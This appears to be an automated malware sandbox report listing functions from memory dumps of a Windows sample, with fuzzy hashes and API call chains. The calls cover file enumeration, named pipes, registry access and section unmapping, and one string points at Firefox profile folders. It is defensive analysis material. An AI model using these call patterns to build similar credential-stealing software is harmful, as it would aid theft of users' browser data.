    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C6C08, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141 Total matches: 19registrysynchronization
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
